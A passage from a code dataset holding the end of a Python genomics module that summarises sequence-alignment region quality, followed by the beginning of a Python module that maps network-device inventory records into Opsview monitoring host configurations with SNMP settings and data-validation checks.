skipped\n include_in_skip = np.logical_and(\n info.hmm, np.logical_or(\n info.unseq, info.gap))\n if np.any(include_in_skip):\n ind = np.where(include_in_skip)[0][0]\n err = ('Need to skip site specified as included '\n f'seq1: {seq1[ind]}, seq2: {seq2[ind]}, index: {ind}')\n log.exception(err)\n raise ValueError(err)\n\n return total_match, total_sites, info\n\n def seq_id_unmasked(self,\n seq1: np.array,\n seq2: np.array,\n offset: int,\n exclude_sites1: List[int],\n exclude_sites2: List[int]) -> Tuple[\n int, int, Flag_Info]:\n '''\n Compare two sequences and provide statistics of their overlap\n considering only the included sites.\n Takes two sequences, an offset applied to each excluded sites list\n Returns:\n -total number of matching sites in non-excluded sites. A position is\n excluded if it is an element of either excluded site list - offset,\n or it is a gap or unsequenced symbol in either sequence.\n -total number of non-excluded sites\n A Flag_Info object with:\n -mask_flag: a boolean array that is true if the position is in\n either excluded list - offset\n '''\n info = Flag_Info()\n info.gap = np.logical_or(seq1 == self.symbols['gap'],\n seq2 == self.symbols['gap'])\n info.unseq = np.logical_or(seq1 == self.symbols['unsequenced'],\n seq2 == self.symbols['unsequenced'])\n exclude_sites1 = np.array(exclude_sites1)\n exclude_sites2 = np.array(exclude_sites2)\n\n # convert offset excluded sites to boolean array\n info.mask = np.zeros(seq1.shape, bool)\n if exclude_sites1.size != 0:\n sites1 = exclude_sites1 - offset\n sites1 = sites1[np.logical_and(sites1 < len(info.gap),\n sites1 >= 0)]\n info.mask[sites1] = True\n\n if exclude_sites2.size != 0:\n sites2 = exclude_sites2 - offset\n sites2 = sites2[np.logical_and(sites2 < len(info.gap),\n sites2 >= 0)]\n info.mask[sites2] = True\n\n # find sites that are not masked, gapped, or unsequenced\n sites = np.logical_not(\n np.logical_or(\n info.mask,\n np.logical_or(\n info.gap, info.unseq)))\n\n # determine totals\n total_sites = np.sum(sites)\n total_match = np.sum(\n np.logical_and(\n seq1 == seq2,\n sites))\n\n return total_match, total_sites, info\n\n def process_alignment(self,\n reference_index: int,\n state_index: int,\n chromosome: str,\n strain: str,\n positions: np.array,\n region: Region_Database,\n region_writer: Region_Writer):\n '''\n Analyze the alignment of a given strain, chromosome, and position.\n Result is stored in the provided region database\n '''\n sequences, alignments, masked_sites = self.get_indices(chromosome,\n strain)\n\n # convert position indices from indices in master reference to\n # indices in alignment\n ps_align = alignments[reference_index][positions]\n\n for i, (r_id, start, end) in enumerate(region.get_entries(strain)):\n start, end = self.get_slice(start, end,\n alignments[reference_index],\n ps_align)\n\n info = Flag_Info()\n info.initialize_flags(\n end - start + 1,\n len(self.known_states))\n\n for ind, state in enumerate(self.known_states):\n hmm, nongap, nonmask = self.get_stats(\n sequences[-1][start:end + 1],\n sequences[ind][start:end + 1],\n start,\n ps_align,\n (masked_sites[ind],\n masked_sites[-1]))\n\n region.set_region(strain, i, state,\n hmm,\n nongap,\n nonmask)\n\n info.add_sequence_flags(hmm[2], ind)\n info.add_mask_flags(nonmask[2], ind)\n\n info_string = info.encode_info(reference_index, state_index)\n\n region_writer.write_header(r_id)\n region_writer.write_sequences(\n strain,\n alignments,\n sequences,\n (start, end))\n region_writer.write_info_string(info_string)\n\n # and keep track of each symbol count\n region.update_counts(strain, i, info_string)\n\n def get_indices(self, chromosome: str, strain: str) -> Tuple:\n '''\n Get the sequences and different indices for the provided\n chromosome and strain\n Returned tuple contains:\n -sequences as np.array\n -index alignment list of indices for each sequence\n -masked_sites, index aligned for each sequence\n '''\n _, sequences = read_fasta.read_fasta(\n self.alignments.format(chrom=chromosome, strain=strain))\n\n # to go from index in reference seq to index in alignment\n alignments = [\n self.index_alignment_by_reference(seq)\n for seq in sequences\n ]\n\n masked = self.read_masked_sites(chromosome, strain)\n\n masked_sites = [\n alignments[ind][self.masked_sites[chromosome][state]]\n for ind, state in enumerate(self.known_states)\n ] + [alignments[-1][masked]] # for strain\n\n return sequences, alignments, masked_sites\n\n def index_alignment_by_reference(self, sequence: np.array) -> np.array:\n '''\n Find locations of non-gapped sites in sequence\n want a way to go from reference sequence coordinate to index in\n alignment\n '''\n return np.where(sequence != self.symbols['gap'])[0]\n\n def get_slice(self,\n start: int,\n end: int,\n alignment: np.array,\n ps_align: np.array) -> Tuple[int, int]:\n '''\n Get start and end positions of index aligned sequence.\n Checks that positions are valid (in ps_align), and raises\n value errors otherwise\n '''\n # index of start and end of region in aligned sequences\n slice_start, slice_end = alignment[[start, end]]\n\n if not np.in1d([slice_start, slice_end], ps_align).all():\n err = 'Slice not found in position alignment'\n log.exception(err)\n raise ValueError(err)\n\n return slice_start, slice_end\n\n\nclass Region_Database():\n '''\n Contains data and logic for regions data during summarizing\n '''\n def __init__(self,\n labeled_file: str,\n chromosome: str,\n known_states: List[str]):\n '''\n Read in labeled file and store resulting table and labels\n '''\n self.info_string_symbols = list('.-_npbcxNPBCX')\n\n self.label_prefixes = ['match_nongap',\n 'num_sites_nongap',\n 'match_hmm',\n 'match_nonmask',\n 'num_sites_nonmask']\n\n self.data, self.labels = read_table.read_table_columns(\n labeled_file,\n sep='\\t',\n group_by='strain',\n chromosome=chromosome)\n\n if self.labels[0] != 'region_id':\n err = 'Unexpected labeled format'\n log.exception(err)\n raise ValueError(err)\n\n for strain, data in self.data.items():\n n = len(data['region_id'])\n\n for s in known_states:\n for lbl in self.label_prefixes:\n data[f'{lbl}_{s}'] = [0] * n\n\n for s in self.info_string_symbols:\n data['count_' + s] = [0] * n\n\n self.labels += [f'{lbl}_{st}' for lbl in self.label_prefixes\n for st in known_states]\n self.labels += ['count_' + x for x in self.info_string_symbols]\n\n def has_strain(self, strain: str) -> bool:\n '''\n Checks if the strain is in this database\n '''\n return strain in self.data\n\n def get_entries(self, strain: str) -> Tuple[str, int, int]:\n '''\n returns an iterator for the region entries of the strain\n with region id (string), start (int) and end (int) positions\n '''\n if not self.has_strain(strain):\n err = f'Region Database does not contain strain {strain}'\n log.exception(err)\n raise ValueError(err)\n\n r_ids = self.data[strain]['region_id']\n starts = self.data[strain]['start']\n ends = self.data[strain]['end']\n for i in range(len(r_ids)):\n yield (r_ids[i], int(starts[i]), int(ends[i]))\n\n def set_region(self,\n strain: str,\n index: int,\n state: str,\n hmm, nongap, nonmask):\n '''\n Set the region state with the provided values.\n hmm, nongap and nonmask are tuples of the (match, total) values\n '''\n ds = self.data[strain]\n MATCH, TOTAL = 0, 1\n if hmm[TOTAL] is not None:\n ds['num_sites_hmm'][index] = hmm[TOTAL]\n\n ds[f'match_hmm_{state}'][index] = hmm[MATCH]\n\n ds[f'match_nongap_{state}'][index] = nongap[MATCH]\n ds[f'num_sites_nongap_{state}'][index] = nongap[TOTAL]\n\n ds[f'match_nonmask_{state}'][index] = nonmask[MATCH]\n ds[f'num_sites_nonmask_{state}'][index] = nonmask[TOTAL]\n\n def update_counts(self,\n strain: str,\n index: int,\n info_string: str):\n '''\n Update the counts variables based on the provided info string\n '''\n counts = Counter(info_string)\n for sym in self.info_string_symbols:\n self.data[strain]['count_' + sym][index] = counts[sym]\n\n def generate_output(self):\n '''\n Yield lines for writing to the quality output file.\n To save memory, this effectively deletes the data structure!\n Outputs are tab delimited, sorted by region_id\n '''\n # reorganize output as list of tuples ordered by label\n output = []\n # have to store this as dict changes during iterations\n strains = list(self.data.keys())\n for strain in strains:\n # pop to limit memory usage\n d = self.data.pop(strain)\n output += list(zip(*[d[l] for l in self.labels]))\n\n # sort by region id (index 0, remove r #[1:])\n for entry in sorted(output, key=lambda e: int(e[0][1:])):\n yield '\\t'.join([str(e) for e in entry]) + '\\n'\n\n def generate_header(self):\n '''\n Generate a header line for the region database\n '''\n return '\\t'.join(self.labels) + '\\n'\n\n\nclass Region_Writer():\n '''\n Controls the writing of region files and indices\n '''\n def __init__(self,\n region_file: str,\n index_file: str,\n known_states: List[str]):\n self.region_file = region_file\n self.index_file = index_file\n self.index = {}\n self.known_states = known_states\n\n def __enter__(self):\n self.region_writer = gzip.open(self.region_file, 'wt')\n\n return self\n\n def __exit__(self, type, value, traceback):\n self.region_writer.close()\n\n if traceback is None:\n # write index\n with open(self.index_file, 'wb') as index_writer:\n pickle.dump(self.index, index_writer)\n return True\n\n else:\n return False\n\n def write_header(self, region_id: str):\n '''\n Add a header line with the region id\n '''\n self.index[int(region_id[1:])] = self.region_writer.tell()\n self.region_writer.write(f'#{region_id}\\n')\n\n def write_sequences(self,\n strain: str,\n alignments: List,\n sequences: np.array,\n indices: Tuple):\n '''\n Write sequences to region file\n '''\n start, end = indices\n names = self.known_states + [strain]\n for sj, name in enumerate(names):\n startj = bisect.bisect_left(alignments[sj], start)\n endj = bisect.bisect_left(alignments[sj], end)\n\n self.region_writer.write(f'> {name} {startj} {endj}\\n')\n\n self.region_writer.write(''.join(\n sequences[sj][start:end+1]) + '\\n')\n\n def write_info_string(self, info_string: str):\n '''\n Write info string with header to region file\n '''\n # write info string\n self.region_writer.write('> info\\n')\n self.region_writer.write(info_string + '\\n')\n\n\nclass Position_Reader():\n '''\n Read in position file, yielding positions until no longer on current\n chromosome\n '''\n\n def __init__(self, position_file):\n self.position_file = position_file\n self.last_position = 0\n\n def __enter__(self):\n self.reader = gzip.open(self.position_file, 'rt')\n return self\n\n def __exit__(self, type, value, traceback):\n self.reader.close()\n return traceback is None\n\n def get_positions(self,\n region: Region_Database,\n chromosome: str) -> Tuple[str, np.array]:\n self.reader.seek(self.last_position)\n line = self.next_line()\n while line != '':\n line = line.split('\\t')\n\n chrm = line[1]\n if chrm != chromosome:\n break\n\n strain = line[0]\n if not region.has_strain(strain):\n line = self.next_line()\n continue\n\n yield strain, np.array(line[2:], dtype=int)\n\n line = self.next_line()\n\n def next_line(self) -> str:\n self.last_position = self.reader.tell()\n line = self.reader.readline()\n return line\n\n\nclass Quality_Writer():\n '''\n Control writing of quality file from region database\n '''\n def __init__(self, quality_filename):\n self.filename = quality_filename\n self.first_write = True\n\n def __enter__(self):\n self.writer = open(self.filename, 'w')\n return self\n\n def __exit__(self, type, value, traceback):\n self.writer.close()\n return traceback is None\n\n def write_quality(self, region: Region_Database):\n '''\n Writes header if needed and region database values\n '''\n if self.first_write is True:\n self.writer.write(region.generate_header())\n self.first_write = False\n\n for line in region.generate_output():\n self.writer.write(line)\n","sub_path":"code/analyze/summarize_region_quality.py","file_name":"summarize_region_quality.py","file_ext":"py","file_size_in_byte":35517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"54669194","text":"__author__ = 'lhs'\nfrom dbservices import provinces, devicetypes, hostgroups, hosttemplates, icons, monitoringservers, \\\n plannings, opsviewservers, maindeparts\nfrom exc.exceptions import *\nimport logging\nfrom api import opsviewclient, insideclient\nfrom utils import servicechecklog, apilog, jsonload, config, servicecheck\nfrom utils import serviceimportlog\nfrom utils import dbopsview as dbroute\n# Checking valid ip\nimport re\n\nlogger = logging.getLogger(__name__)\n\nAPI_CALLING_ERROR = 200\nKEY_ERROR = 201\n\n\nclass DataMapping:\n # Template default when create new dev\n template_json = jsonload.get_json_template('host.json')\n\n def __init__(self, devices, plannings):\n # logger.debug('total dev from inside: %s' % len(devices))\n self.opsviewclients = {}\n self.devices = devices\n self.plannings = plannings\n\n # Get opsview client for device using key is ip of opsview server that will call opsview restful api\n def get_opsview_client(self, opsview_ip):\n \"\"\"\n :param opsview_ip: ip v4 of opsview api server\n :return: opsviewclient instance\n \"\"\"\n try:\n\n if opsview_ip in self.opsviewclients:\n return self.opsviewclients[opsview_ip]\n\n else:\n new_opsviewclient = opsviewclient.OpsviewClient(opsview_ip=opsview_ip)\n self.opsviewclients[opsview_ip] = new_opsviewclient\n return new_opsviewclient\n except OpsViewAPIError as ex:\n raise\n\n # Start Noc formart for key when mapping to json opsview\n # mapping host title\n @staticmethod\n def get_host_title(dev_name, dev_ip, main_depart):\n return '%s-%s-%s' % (main_depart, dev_name, dev_ip)\n\n # Snmp version\n @staticmethod\n def get_snmp_version_for_opsview_json(snmp_version):\n \"\"\"\n :param snmp_version: value in mapping database 1, 2, 3\n :return: value for opsview json\n \"\"\"\n if (snmp_version == '2') is True:\n return '2c'\n\n return snmp_version\n\n # Alias mapping\n @staticmethod\n def get_alias(province, ring_name, device_type):\n if ring_name != '':\n return '%s_%s_%s' % (province, ring_name, device_type)\n else:\n return '%s_%s' % (province, device_type)\n\n @staticmethod\n def get_inside_data(file_name=None):\n # Call API\n try:\n if file_name is None:\n return insideclient.get_device_list()\n else:\n # Load from file\n return jsonload.get_json_data(file_name)\n except InsideError as ex:\n logger.error(ex)\n\n @staticmethod\n def get_noc_planning_file(file_name):\n plannings = []\n path_file = config.get_configuration_file(file_name)\n f = open(path_file, 'r')\n\n for line in f:\n plannings.append(line)\n\n logger.info('Line Number of planning: %s' % len(plannings))\n return plannings\n\n @staticmethod\n def get_checking_script_info(file_name):\n checking = []\n path_file = config.get_configuration_file(file_name)\n f = open(path_file, 'r')\n\n for line in f:\n checking.append(line)\n\n logger.info('Line Number of planning: %s' % len(checking))\n return checking\n\n @staticmethod\n def get_province(province_name):\n try:\n try:\n province = provinces.get_province(name=province_name)\n return province\n\n except ProvinceNotFound:\n province = provinces.insert_province(name=province_name)\n return province\n except ProvinceError:\n raise\n\n @staticmethod\n def get_device_type(device_type_name):\n try:\n try:\n device_type = devicetypes.get_device_type_no_caching(device_type_name)\n return device_type\n except DeviceTypeNotFound:\n device_type = devicetypes.create_device_type(name=device_type_name)\n return device_type\n except DeviceTypeError:\n raise\n\n # Get Opsview server api\n @staticmethod\n def get_opsview_server(ip, name=None, desc=None):\n try:\n try:\n opsview_server = opsviewservers.get_opsview_server(ip)\n return opsview_server\n except OpsviewServerNotFound:\n opsview_server = opsviewservers.insert_opsview_server(ip=ip, name=name, desc=desc)\n return opsview_server\n except OpsviewServerError:\n raise\n\n @staticmethod\n def get_main_depart(name):\n try:\n try:\n main_depart = maindeparts.get_main_depart(name=name)\n return main_depart\n except OpsviewMainDepartNotFound:\n main_depart = maindeparts.insert_main_depart(name=name)\n return main_depart\n except OpsviewMainDepartError:\n raise\n\n # Get planning of dev, if it is not exist, insert\n @staticmethod\n def get_planning(province, device_type, main_depart, opsview_server,\n host_group, host_template, icon, monitor_by, snmp_community, snmp_version):\n try:\n try:\n planning = plannings.get_planning_from_inside_info(province=province.name, device_type=device_type.name,\n main_depart=main_depart.name)\n logger.debug(\n 'duplicate_mapping when insert from mapping file: %s %s %s' % (province, device_type, main_depart))\n return planning\n except PlanningNotFound:\n planning = plannings.insert_planning(province=province, device_type=device_type, host_group=host_group,\n host_template=host_template, icon=icon, monitor_by=monitor_by,\n snmp_community=snmp_community, snmp_version=snmp_version,\n main_depart=main_depart, opsview_server=opsview_server)\n\n return planning\n except PlanningError:\n raise\n\n # check whether two json have same or not\n @staticmethod\n def checking_template_json(conversion_json, host_json):\n conversion_json = conversion_json['object']\n host_json = host_json['object']\n # logger.debug(conversion_json['monitored_by'])\n # logger.debug(host_json['monitored_by'])\n\n for key in conversion_json:\n\n if key in host_json and key in conversion_json:\n # Difference value\n if host_json[key] != conversion_json[key]:\n logger.debug(key)\n return False\n\n # Difference key in two jsons\n else:\n return False\n\n return True\n\n @staticmethod\n # Get checking script for eache device type\n def get_checking_script_for_each_dev():\n checking_script_data = DataMapping.get_checking_script_info('checkingscript.data')\n logger.debug(checking_script_data)\n for row in checking_script_data:\n logger.debug(row)\n result = row.split('\\t')\n device_type_name = result[0]\n script_name = result[1]\n is_checking = result[2]\n\n if is_checking == 'v\\n':\n is_checking = True\n else:\n is_checking = False\n\n try:\n device_type = DataMapping.get_device_type(device_type_name=device_type_name)\n\n # Assign updated file with new value\n device_type.script_name = script_name\n device_type.checking = is_checking\n # Update data\n devicetypes.update_device_type(dev_type=device_type)\n except DeviceTypeError as ex:\n logger.error(ex)\n\n # Get planning dev of noc from opsviewplan.data file\n def sync_planning_db(self):\n # logger.info(len(self.plannings))\n logger.info('insert mapping to database')\n for line in self.plannings:\n\n # Thai Binh\tINF-TBH\tZyxel IES 1248-51\t210.245.0.226\t2. DSLAM Chi Nhanh\tFTN DSLAM\n # SYMBOL - xDSL\tOpsview FTN 04\tpublic\t1\n # province, device_type, server, host_group, icon, icon_path, monitor_by, snmp_community = line.split('\\t')\n # logger.debug(result)\n result = line.split('\\t')\n\n province_name = result[0]\n main_depart_name = result[1]\n device_type_name = result[2]\n opsview_sv_ip = result[3]\n host_group_name = result[4]\n host_template_name = result[5]\n icon_name = result[6]\n monitoring_server_name = result[7]\n snmp_rocommunity = result[8]\n snmp_version = result[9]\n # logger.debug(snmp_version.split('\\n'))\n snmp_version = snmp_version.split('\\n')[0]\n # snmp_version = int(snmp_version)\n\n try:\n province = DataMapping.get_province(province_name)\n device_type = DataMapping.get_device_type(device_type_name)\n opsview_server = DataMapping.get_opsview_server(ip=opsview_sv_ip)\n main_depart = DataMapping.get_main_depart(main_depart_name)\n\n host_group = hostgroups.get_host_group(name=host_group_name,\n db_name=dbroute.get_opsview_database(opsview_ip=opsview_sv_ip))\n host_template = hosttemplates.get_host_template(host_template_name,\n db_name=dbroute.get_opsview_database(\n opsview_ip=opsview_sv_ip))\n\n icon = icons.get_icon_using_name(name=icon_name,\n db_name=dbroute.get_opsview_database(opsview_ip=opsview_sv_ip))\n\n monitor_server = monitoringservers.get_monitoring_server(name=monitoring_server_name,\n db_name=dbroute.get_opsview_database(\n opsview_ip=opsview_sv_ip))\n\n DataMapping.get_planning(province=province, device_type=device_type,\n host_group=host_group.name, host_template=host_template.name,\n icon=icon.name,\n monitor_by=monitor_server.name, snmp_community=snmp_rocommunity,\n snmp_version=snmp_version, main_depart=main_depart,\n opsview_server=opsview_server)\n\n except OpsViewError as ex:\n logger.exception(ex)\n continue\n\n @staticmethod\n def add_planning_record_from_csv_data(csv_list):\n \"\"\"\n :param csv_list: list of list [value1, value2, value3]\n :return: None\n \"\"\"\n for row in csv_list:\n logger.debug(row)\n province_name = row[0]\n main_depart_name = row[1]\n device_type_name = row[2]\n opsview_sv_ip = row[3]\n host_group_name = row[4]\n host_template_name = row[5]\n icon_name = row[6]\n monitoring_server_name = row[7]\n snmp_rocommunity = row[8]\n snmp_version = row[9]\n\n try:\n province = DataMapping.get_province(province_name)\n device_type = DataMapping.get_device_type(device_type_name)\n opsview_server = DataMapping.get_opsview_server(ip=opsview_sv_ip)\n main_depart = DataMapping.get_main_depart(main_depart_name)\n\n host_group = hostgroups.get_host_group(name=host_group_name,\n db_name=dbroute.get_opsview_database(opsview_ip=opsview_sv_ip))\n host_template = hosttemplates.get_host_template(host_template_name,\n db_name=dbroute.get_opsview_database(\n opsview_ip=opsview_sv_ip))\n\n icon = icons.get_icon_using_name(name=icon_name,\n db_name=dbroute.get_opsview_database(opsview_ip=opsview_sv_ip))\n\n monitor_by = monitoringservers.get_monitoring_server(name=monitoring_server_name,\n db_name=dbroute.get_opsview_database(\n opsview_ip=opsview_sv_ip))\n\n try:\n plannings.get_planning_from_inside_info(province=province.name,\n device_type=device_type.name,\n main_depart=main_depart.name)\n\n message = 'duplicate_mapping when insert from mapping file: %s %s %s' % (province.name,\n device_type.name,\n main_depart.name)\n serviceimportlog.insert_log(description=message, error_code=PlanningImportExist.error_code,\n csv_record_data=row)\n except PlanningNotFound:\n plannings.insert_planning(province=province, device_type=device_type, host_group=host_group,\n host_template=host_template, icon=icon, monitor_by=monitor_by,\n snmp_community=snmp_rocommunity, snmp_version=snmp_version,\n main_depart=main_depart, opsview_server=opsview_server)\n\n\n\n except OpsViewError as ex:\n serviceimportlog.insert_log(error_code=ex.error, description=ex.msg, csv_record_data=row)\n logger.exception(ex)\n continue\n\n # check correct data from inside and opsview. If opsview have one template,\n # from planning dev of db have to exist this template\n def check_info_between_inside_and_noc_planning(self):\n\n for dev in self.devices:\n device_type = dev['DeviceType']\n if device_type == '':\n continue\n\n province = dev['KhuVuc']\n # print '%s: %s' % (device_type, province)\n\n try:\n devicetypes.get_device_type(name=device_type)\n except DeviceTypeNotFound as ex:\n logger.error(ex)\n logger.error(dev)\n\n try:\n provinces.get_province(name=province)\n except ProvinceNotFound as ex:\n logger.error(ex)\n logger.error(dev)\n\n # check duplicate dev's name in all inside dev\n def check_duplicate_host_title_inside_devices(self):\n devices = self.devices\n length = len(self.devices)\n\n for i in range(length):\n # Initial device\n is_duplication = False\n before_duplicate = False\n if i > 0:\n # Check from i to start list. Checking for prevent print duplicate device again\n for k in range(i):\n if devices[k]['TenThietBi'] == devices[i]['TenThietBi'] and devices[k]['IP'] == devices[i]['IP']:\n before_duplicate = True\n break\n\n if before_duplicate:\n continue\n # Check duplicate from i +1 to end list\n for j in range(i + 1, length):\n if devices[j]['TenThietBi'] == devices[i]['TenThietBi'] and devices[j]['IP'] == devices[i]['IP']:\n is_duplication = True\n logger.warn('duplicate host title: %s - %s' % (j, jsonload.get_json_string_from_dict(devices[j])))\n\n # If duplicate device, print device\n if is_duplication is True:\n logger.warn('duplicate host title: %s - %s' % (i, jsonload.get_json_string_from_dict(devices[i])))\n logger.warn('-----------------------------------------')\n\n # check duplicate error dev with have khuvuc, devicetype equal\n\n def check_duplicate_error_mapping(self):\n devices = self.devices\n length = len(self.devices)\n\n for i in range(length):\n # Initial device\n is_duplication = False\n before_duplicate = False\n if i > 0:\n # Check from i to start list. Checking for prevent print duplicate device again\n for k in range(i):\n if str(devices[k]['DeviceType']) == str(devices[i]['DeviceType']) and str(devices[k]['KhuVuc']) \\\n == str(devices[i]['KhuVuc']):\n before_duplicate = True\n break\n # Prevent print device again\n if before_duplicate:\n continue\n\n # Check duplicate from i +1 to end list\n for j in range(i + 1, length):\n if str(devices[j]['DeviceType']) == str(devices[i]['DeviceType']) and str(devices[j]['KhuVuc']) == \\\n str(devices[i]['KhuVuc']):\n is_duplication = True\n logger.warn(\n 'duplicate error mapping: %s - %s' % (j, jsonload.get_json_string_from_dict(devices[j])))\n\n # If duplicate device, print device\n if is_duplication is True:\n logger.warn('duplicate error mapping: %s - %s' % (i, jsonload.get_json_string_from_dict(devices[i])))\n logger.warn('-----------------------------------------')\n else:\n logger.warn(jsonload.get_json_string_from_dict(devices[i]))\n # logger.warn(devices[i])\n\n # check duplicate IP\n\n def check_duplicate_ip_inside_devices(self):\n devices = self.devices\n length = len(self.devices)\n\n for i in range(length):\n # Initial device\n is_duplication = False\n before_duplicate = False\n if i > 0:\n # Check from i to start list. Checking for prevent print duplicate device again\n for k in range(i):\n if str(devices[k]['IP']) == str(devices[i]['IP']):\n before_duplicate = True\n break\n # Prevent print device again\n if before_duplicate:\n continue\n\n # Check duplicate from i +1 to end list\n for j in range(i + 1, length):\n if str(devices[j]['IP']) == str(devices[i]['IP']):\n is_duplication = True\n logger.warn('duplicate ip: %s - %s' % (j, jsonload.get_json_string_from_dict(devices[j])))\n\n # If duplicate device, print device\n if is_duplication is True:\n logger.warn('duplicate ip: %s - %s' % (i, jsonload.get_json_string_from_dict(devices[i])))\n logger.warn('-----------------------------------------')\n\n # check exist mapping for each device\n def check_exist_mapping_for_device(self):\n error_devs = []\n for dev in self.devices:\n dev_type = dev['DeviceType']\n province = dev['KhuVuc']\n main_depart = dev['MainDepart']\n try:\n mapping = plannings.get_planning_from_inside_info(province=province, device_type=dev_type,\n main_depart=main_depart)\n logger.debug(jsonload.get_json_string_from_dict(\n DataMapping.mapping_to_opsview_json(inside_device=dev, mapping=mapping,\n template=self.template_json)))\n except PlanningError:\n # Do not found mapping record for dev\n logger.warning('mapping invalid: %s' % jsonload.get_json_string_from_dict(dev))\n error_devs.append(dev)\n\n # jsonload.export_json_to_file({'getListDeviceAccessResult': error_devs}, 'error_devs_mapping.json')\n\n # Check correct dev's ip\n @staticmethod\n def is_valid_ip(ip):\n m = re.match(r\"^(\\d{1,3})\\.(\\d{1,3})\\.(\\d{1,3})\\.(\\d{1,3})$\", ip)\n is_valid = bool(m) and all(map(lambda n: 0 <= int(n) <= 255, m.groups()))\n\n # Check same invalid case: 255.255.5.09\n if is_valid is True:\n array_number = ip.split('.')\n for number in array_number:\n if len(number) > 1 and number[0] == '0':\n return False\n\n return is_valid\n\n # Check valid Name\n # check name do not have special characters\n @staticmethod\n def is_valid_name(name):\n # Charact fr a to z, 0 to 9, A to Z, length from 3 to 30 characters\n prog = re.compile(\"^[a-z0-9A-Z]{3,30}$\")\n # Pass\n if prog.match(name):\n return True\n\n # False\n return False\n\n @staticmethod\n def mapping_to_opsview_json(inside_device, mapping=None, template=None, update_host_attribute=False):\n \"\"\"\n :param inside_device: information of inside dev,\n {\"ChungLoai\": \"OLT\", \"KhuVuc\": \"Ninh Thuan\",\n \"MainDepart\": \"INF-NTN\",\n \"IP\": \"10.10.182.37\",\n \"RingName\": \"NTN-Ring6\",\n \"DeviceType\": \"GL5600-08P\",\n \"TenThietBi\": \"NTNP00603GC57\"}\n :param template: template from host.json or opsview json from api\n {'object': dev_info_dict}\n :return: json mapping\n \"\"\"\n\n if template is None:\n template = jsonload.get_json_template('host.json')\n\n ring_name = inside_device['RingName']\n province = inside_device['KhuVuc']\n ip = inside_device['IP']\n device_type = inside_device['DeviceType']\n device_name = inside_device['TenThietBi']\n main_depart = inside_device['MainDepart']\n\n template['object']['ip'] = ip\n # Unique host title\n template['object']['name'] = DataMapping.get_host_title(dev_name=device_name,\n dev_ip=ip, main_depart=main_depart)\n\n template['object']['alias'] = DataMapping.get_alias(province=province, ring_name=ring_name,\n device_type=device_type)\n\n try:\n # Get mapping in database. This is dev planning from noc.\n if mapping is None:\n mapping = plannings.get_planning_from_inside_info(province=province, device_type=device_type,\n main_depart=main_depart)\n\n snmp_version = DataMapping.get_snmp_version_for_opsview_json(mapping.snmp_version)\n # Service check mapping\n\n if update_host_attribute is True and mapping.device_type.checking is True:\n # Test do not throw exception\n try:\n\n service_check = servicecheck.get_attributes(script_name=mapping.device_type.script_name,\n version=snmp_version,\n ip=ip, snmp_key=mapping.snmp_community,\n time_out=mapping.device_type.time_out,\n arguments=mapping.device_type.arguments)\n # Timer for script\n '''\n end_time = datetime.now()\n from datetime import datetime, timedelta\n start_time = datetime.now()\n\n if (start_time + timedelta(minutes=1)) < end_time:\n logger.critical('long time: %s' % jsonload.get_json_string_from_dict(inside_device))\n '''\n\n logger.debug('service check from script %s' % jsonload.get_json_string_from_dict(service_check))\n logger.debug('service check from opsview response: %s' % jsonload.get_json_string_from_dict(\n template['object']['hostattributes']))\n\n # check different servicecheck\n is_same, sorted_service_check = jsonload.is_same_service_check(service_check,\n template['object']['hostattributes'])\n\n logger.debug('service_check_compare: %s' % is_same)\n logger.debug(sorted_service_check)\n\n # Update on json opsview if result of service_check is not []\n if len(service_check) > 0:\n if is_same is False:\n update_service_check = jsonload.merge_service_check(service_check,\n list(template['object'][\n 'hostattributes']))\n logger.debug('update service check: %s' % update_service_check)\n template['object']['hostattributes'] = update_service_check\n\n # template['object']['hostattributes'] = sorted_service_check\n else:\n\n servicechecklog.write_service_check_log(device_info=inside_device,\n description='result script is []', status='error',\n device_name=device_name, error_code=500)\n logger.warning(jsonload.get_json_string_from_dict(inside_device))\n\n except TimeoutScript as ex:\n servicechecklog.write_service_check_log(device_info=inside_device,\n description=ex.msg, status='error',\n device_name=device_name, error_code=600)\n logger.warning('long time: %s' % jsonload.get_json_string_from_dict(inside_device))\n\n except OpsViewError as ex:\n logger.error(ex)\n\n # host_template list\n host_template_host = [hosttemplates.get_host_template(name=mapping.host_template,\n db_name=dbroute.get_opsview_database(\n mapping.opsview_server.ip)).to_dict()]\n\n # logger.debug(host_template_host)\n template['object']['hosttemplates'] = host_template_host\n\n template['object']['hostgroup'] = hostgroups.get_host_group(name=mapping.host_group,\n db_name=dbroute.get_opsview_database(\n mapping.opsview_server.ip)).to_dict()\n\n template['object']['snmp_community'] = mapping.snmp_community\n template['object']['icon'] = icons.get_icon_using_name(name=mapping.icon,\n db_name=dbroute.get_opsview_database(\n opsview_ip=mapping.opsview_server.ip)).to_dict()\n\n template['object']['monitored_by'] = monitoringservers.get_monitoring_server(name=mapping.monitor_by,\n db_name=dbroute.get_opsview_database(\n opsview_ip=\n mapping.opsview_server.ip)).to_dict()\n template['object']['snmp_version'] = snmp_version\n logger.debug(template['object']['snmp_version'])\n return template\n except OpsViewError:\n raise\n\n # Get all dev from inside to check correct format of ipv4\n def check_invalid_ip(self):\n for dev in self.devices:\n ip = dev['IP']\n if DataMapping.is_valid_ip(ip=ip) is False:\n logger.warn('invalid ip: %s' % jsonload.get_json_string_from_dict(dev))\n\n # Get all dev from inside to check correct name validation\n def check_invalid_dev_name(self):\n for dev in self.devices:\n name = dev['TenThietBi']\n if DataMapping.is_valid_name(name) is False:\n logger.warn('invalid name: %s' % jsonload.get_json_string_from_dict(dev))\n\n def check_none_filed(self, filed):\n for dev in self.devices:\n # logger.debug(dev)\n if dev[filed] == '':\n logger.warn('None filed: %s %s' % (filed, jsonload.get_json_string_from_dict(dev)))\n\n def test_valid_data_noc_planning(self):\n for line in self.plannings:\n logger.debug(line)\n result = line.split('\\t')\n province_name = result[0]\n main_depart = result[1]\n device_type_name = result[2]\n opsview_sv_ip = result[3]\n host_group_name = result[4]\n host_template_name = result[5]\n icon_name = result[6]\n monitoring_server_name = result[7]\n snmp_rocommunity = result[8]\n snmp_version = result[9]\n snmp_version = int(snmp_version)\n\n if (province_name is None or province_name == '' or main_depart is None or main_depart == '' or\n device_type_name is None or device_type_name == '' or DataMapping.is_valid_ip(\n opsview_sv_ip) is False\n or host_group_name is None or host_group_name == ''\n or host_template_name is None or host_group_name == ''\n or icon_name is None or icon_name == ''\n or monitoring_server_name is None or monitoring_server_name == ''\n or snmp_rocommunity is None or snmp_rocommunity == ''\n or snmp_version is None or snmp_version == ''):\n logger.warn('invalid mapping data: %s' % result)\n\n # Update dev with inside dev information on opsview\n def 